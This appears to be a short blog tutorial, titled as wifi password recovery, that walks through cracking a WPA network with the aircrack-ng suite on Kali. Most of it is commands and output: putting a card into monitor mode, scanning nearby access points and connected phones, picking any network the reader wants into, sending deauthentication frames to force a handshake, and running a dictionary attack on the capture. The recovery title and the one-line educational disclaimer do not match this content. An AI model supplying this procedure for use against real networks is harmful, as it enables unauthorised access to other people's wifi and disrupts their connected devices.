How Do I Recover My Wifi Password

this article is only for educational purpose n sry for my horrible english hope you dont mind

0x1 set up environment

before we get started , make sure the enough disk space you have

check details:

1

df -h

if ur installation kali on vmware or something virtual environments , pls prepare a wireless card heres im using rtl8821cu chipset as a tutorial

check ur driver

1

airmon-ng

install linux-head kernel files

1
2
3


sudo apt-get update -y && sudo apt-get dist-upgrade
sudo apt install linux-headers-`uname -r`
sudo apt install bc module-assistant build-essential dkms -y

and find driver on github to install and reboot

1

sudo reboot

when ur done , so lets switch to root account

1

sudo -i

0x2 get into honeypot

when input following command and press tab twice on ur keyboard for tips

1

iwconfig mode

if it supports , the “Monitor” keyword that you should have

1
2


Completing operating mode
Ad-Hoc     Auto       Managed    Master     Monitor    Repeater   Secondary

before we scan the wireless you should kill the processes that conflict with airmon-ng

1

airmon-ng check kill

now get into next step , load monitor mode and ur wifi will go temporarily shutdown

check driver name

1
2
3
4
5
6
7
8
9


iwconfig 


└─# iwconfig
lo        no wireless extensions.

eth0      no wireless extensions.

wlan0     unassociated  Nickname:"<WIFI@REALTEK>"

1
2


airmon-ng start <DriverName> 
airmon-ng start wlan0 

after u put this command driver name [may] have changed but i dont lol input iwconfig to check again

1
2
3
4


PHY     Interface       Driver          Chipset

phy0    wlan0           rtl8821cu       Realtek Semiconductor Corp. 802.11ac NIC
                (monitor mode enabled)

now scanning for nearby wifi

1

airodump-ng <name>

you can see massive details flashing on ur terminal , you only need to remember just several details

as you can see there are two BSSID addresses

1
2
3
4
5
6


 CH  1 ][ Elapsed: 2 mins ][ 2024-03-02 00:54

 BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID
 

 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes

the first one belongs APs and the second is which phone(STATION) is connected to which AP

pick one of ap you want to “connect”

remember its BSSID ,channel(CH) parameters. which device is connected to itself .the device MAC address you need to note also .

if no devices connecting AP’s that you wanna into .we cant crack

start up another terminal with root

when we got device’s MAC address and AP’s BSSID lets start attack

when you typing the following command when gets done it will generate some “cap” files that you just captured where directories are you in.

re-run

1
2


airmon-ng stop drivername  
airmon-ng start drivername -c [channel]

1

aireplay-ng -0 2 -a AP's MAC  -c phone's MAC Drivername

and waiting to check <WPA handshake> shows on the first one terminal (right top position)

after get cap file then have fun

1

aircrack-ng -w  psswrdfile  capfile